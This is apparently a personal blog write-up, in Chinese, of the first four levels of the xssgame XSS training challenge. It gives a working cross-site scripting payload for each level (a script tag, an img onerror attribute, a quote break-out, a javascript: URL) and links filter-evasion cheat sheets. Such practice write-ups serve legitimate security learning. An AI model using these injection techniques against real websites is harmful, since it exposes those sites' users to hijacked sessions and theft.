Jirairya

xssgame

2017-07-05

玩了一下xssgame

关于XSS Cheat Sheet的一些链接:

  • https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
  • http://brutelogic.com.br/blog/cheat-sheet/
  • http://teamultimate.in/xss-cheat-sheet-waf-filter-bypass/

Level 1

level 1的地址:http://www.xssgame.com/m4KKGHi2rVUN

题目

解题:

<script>alert(1);</script>

通关

Level 2

Level2的地址:http://www.xssgame.com/WrfpuKFX8GNr

Level2

先插入:

<img src='test' onerror='alert("1")'>

查看源码,看到:

<img id="loading" src="/static/img/loading.gif" style="width: 50%" onload="startTimer('&lt;img src=&#39;test&#39; onerror=&#39;alert(&#34;1&#34;)&#39;&gt;');" />

由此可知,可进行代码注入:

'-alert(1)-'

通关

Level3

Level3的地址:http://www.xssgame.com/u0hrDTsXmyVJ

Level3 通过查看源码:

function chooseTab(name) {
        var html = "Cat " + parseInt(name) + "<br>";
        html += "<img src='/static/img/cat" + name + ".jpg' />";

        document.getElementById('tabContent').innerHTML = html;

        // Select the current tab
        var tabs = document.querySelectorAll('.tab');
        for (var i = 0; i < tabs.length; i++) {
          if (tabs[i].id == "tab" + parseInt(name)) {
            tabs[i].className = "tab active";
            } else {
            tabs[i].className = "tab";
          }
        }

        window.location.hash = name;

        // Tell parent we've changed the tab
        top.postMessage({'url': self.location.toString()}, "*");
      }

根据改变图片的id来切换图片,若改成没有的id,即可用onerror事件触发alert():

#1'onerror=alert(1)>

通关

Level4

Level4地址是:http://www.xssgame.com/__58a1wgqGgI

Level4

注册成功页面跳转链接welcome替换成javascript:alert(1)即可通关:

javascript:alert(1)

通关

只做到了第四关,后面的有时间再继续…..


Similar Posts

Comments